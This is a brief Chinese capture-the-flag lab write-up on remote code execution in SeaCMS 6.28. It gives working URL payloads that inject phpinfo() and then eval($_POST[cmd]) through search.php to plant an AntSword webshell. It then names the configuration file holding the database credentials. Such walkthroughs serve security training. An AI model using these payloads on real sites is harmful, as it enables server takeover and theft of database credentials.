# [春秋云实企安殿]Test / 海洋CMS6.28远程代码执行


# [春秋云实企安殿]Test / 海洋CMS_6.28 远程代码执行

看到海洋cms，直接去搜相关漏洞

![image-20240309113441694](http://cdn.wutongliran.top/img/image-20240309113441694.png)

漏洞复现：https://blog.csdn.net/weixin_47443077/article/details/116953672

payload：`/search.php?searchtype=5&tid=&area=phpinfo()`

![image-20240309113521582](http://cdn.wutongliran.top/img/image-20240309113521582.png)

说明存在RCE漏洞

蚁剑连接：`/search.php?searchtype=5&tid=&area=eval($_POST[cmd])`

找到数据库连接信息：`/var/www/html/data/common.inc.php`

![image-20240309113721368](http://cdn.wutongliran.top/img/image-20240309113721368.png)

点击数据操作

![image-20240309113807631](http://cdn.wutongliran.top/img/image-20240309113807631.png)

<img src="http://cdn.wutongliran.top/img/image-20240309113905119.png" alt="image-20240309113905119" style="zoom:67%;" />

![image-20240309113941443](http://cdn.wutongliran.top/img/image-20240309113941443.png)